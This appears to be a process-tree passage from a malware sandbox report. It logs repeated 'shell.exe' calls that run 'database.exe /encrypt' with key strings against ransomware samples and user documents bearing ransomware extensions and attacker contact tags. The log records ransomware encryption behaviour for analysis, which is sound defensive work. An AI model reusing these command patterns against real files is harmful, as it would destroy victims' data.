                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\5zcDe2Gk-DpTelhmT.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\6fnlIf3K-69USjuQ5.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\6uGvgh4l-SeO9dg4j.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\BackupConvert.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\Bv4uLoER-EylLZw2W.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CompareSync.csv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmApprove.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmSave.txt.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CopyUnregister.csv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-BFZAWQBHFFNLEXJPRTDKOFVKBPOOAO.SJV.cbf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4224
